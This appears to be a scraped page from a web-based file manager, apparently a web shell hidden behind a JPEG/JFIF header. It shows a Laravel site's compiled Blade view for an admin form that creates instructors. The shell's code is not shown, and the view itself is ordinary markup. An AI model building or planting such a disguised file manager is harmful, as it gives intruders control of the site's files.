���� JFIF x x �� C �� C �� " �� �� � } !1AQa "q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� �� � w !1AQ aq"2�B���� #3R�br�{
gilour
Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
gilour
/
storage
/
framework
/
views
:
eb0b917f326422556311c5b4046a93eb.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<div class="row mb-3"> <label for="user-name" class="form-label ol-form-label col-sm-2 col-form-label"><?php echo e(get_phrase('Name')); ?><span class="text-danger ms-1">*</span></label> <div class="col-sm-8"> <input type="text" name="name" class="form-control ol-form-control" id="user-name" <?php if(isset($instructor->name)): ?> value="<?php echo e($instructor->name); ?>" <?php endif; ?> required> </div> </div> <div class="row mb-3"> <label for="short_description" class="form-label ol-form-label col-sm-2 col-form-label"><?php echo e(get_phrase('Biography')); ?></label> <div class="col-sm-8"> <textarea name="about" rows="3" class="form-control ol-form-control" id="short_description"><?php if(isset($instructor->about)): ?><?php echo e($instructor->about); ?><?php endif; ?></textarea> </div> </div> <div class="row mb-3"> <label for="user-phone" class="form-label ol-form-label col-sm-2 col-form-label"><?php echo e(get_phrase('Phone')); ?></label> <div class="col-sm-8"> <input type="text" name="phone" class="form-control ol-form-control" id="user-phone" <?php if(isset($instructor->phone)): ?> value="<?php echo e($instructor->phone); ?>" <?php endif; ?>> </div> </div> <div class="row mb-3"> <label for="user-address" class="form-label ol-form-label col-sm-2 col-form-label"><?php echo e(get_phrase('Address')); ?></label> <div class="col-sm-8"> <input type="text" name="address" class="form-control ol-form-control" id="user-address" <?php if(isset($instructor->address)): ?> value="<?php echo e($instructor->address); ?>" <?php endif; ?>> </div> </div> <div class="row mb-3"> <label for="photo" class="form-label ol-form-label col-sm-2 col-form-label"><?php echo e(get_phrase('User image')); ?></label> <div class="col-sm-8"> <input type="file" name="photo" class="form-control ol-form-control" id="photo"> </div> </div> <?php /**PATH C:\xampp\htdocs\Arise\resources\views/admin/instructor/create_instructor_basic.blade.php ENDPATH**/ ?>